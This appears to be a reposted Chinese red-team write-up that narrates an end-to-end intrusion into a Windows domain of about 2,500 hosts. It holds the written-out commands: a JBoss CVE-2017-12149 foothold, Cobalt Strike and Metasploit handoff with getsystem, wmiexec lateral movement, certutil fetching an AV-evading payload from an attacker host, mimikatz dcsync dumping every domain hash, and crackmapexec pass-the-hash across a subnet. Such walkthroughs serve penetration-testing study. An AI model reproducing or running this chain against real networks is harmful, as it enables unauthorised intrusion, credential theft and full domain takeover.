一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

admin 2022年3月23日20:13:27评论3 views字数 1531阅读5分6秒阅读模式

前言

首先是通过 CVE-2017-12149 拿到了一个口子:

一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

但其实 Jboss 的这个路径可以查看到日志 http://redteam.red:9090/status 发现有日志,已经被上传了 webshell:

一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

后来通过 Bypass 后使用 powershell 上线到 CobaltStrike:

一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

利用 Metasploit 特权提权拿到 SYSTEM SHELL

上线之后通过信息搜集发现有几百个补丁,通过已知漏洞提权无果:

一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

随后吧 CobaltStrike 的 Beacon 互传到了 Metasploit:

CS:
创建监听器windows/foreign/reverse_http
执行监听器 spawn msf

MSF:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

然后通过 Metasploit 的提权检测模块找到了几个提权 exp :

run post/multi/recon/local_exploit_suggester
一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

然后利用提权 exp :

一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

发现用户没变,但是当前特权变多了:

一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

然后直接 getsystem 提权到 SYSTEM:

一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

最后利用 SYSYEM 身份的把 shell 传到 Cobaltstrike:

一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透
一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

当前权限就可以抓到密码了:

一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

内网渗透

虽然已经拿到 SYSTEM 会话身份,但是发现没有域管的进程,结果只能另寻他路!然后用抓到到密码去喷射域内其他主机:

一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

然后横向 wmi 横向移动:

 proxychains python3 wmiexec.py -shell-type cmd administrator:[email protected] -codec gbk

一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

之后发现 10.xx.0.156 有一个域管的进程:tsklist /v

并且发现当前机器还有微软自带杀毒:

一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

随后通过 Golang 做了一下免杀,然后让目标下载我们的 exe,通过 certutil 下载我们的 exe:

一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

然后运行发现有问题:

一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

然后我吧 exe 编码成 txt:

certutil -encode main.exe main.txt

然后目标下载 txt 然后解码再运行:

certutil.exe -urlcache -split -f http://redteam.red:80/download/main.txt

certutil -decode main.txt main.exe

直接上线到 CobaltStrike:

一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

然后先 getsystem 提权到 SYSYEM:

一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

然后窃取域管的进程:

一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透
一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

随后查询域控IP:

shell net group "Domain Controllers" /domain
shell ping Controllers Computer (ping 域控机器名即可得到IP)

直接拿到域控:

一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

最后直接 dcsync dump 域内全部 hash:

mimikatz lsadump::dcsync /domain:redteam.red /all /csv > c:hash.txt

一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

这个时候域内数千多个域用户的 hash 都拿到了,可以进行 pth,此时利用 administrator 的 hash 来对域内机器进行批量执行命令:

proxychains crackmapexec smb 192.168.0.0/24 -u administrator -H xxxxxxxxxxxxxxxxxxxxx -d psnet.com -x "net user"

一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

最后使用 SharpHound.exe 查看下域内信息:

execute-assembly /Users/saulgoodman/Downloads/SharpHound.exe -c all

一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

看了看,内网 5000 多个用户,2500 多台机器都沦陷,没啥难度。

原文始发于微信公众号(渗透攻击红队):一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月23日20:13:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透https://cn-sec.com/archives/838545.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息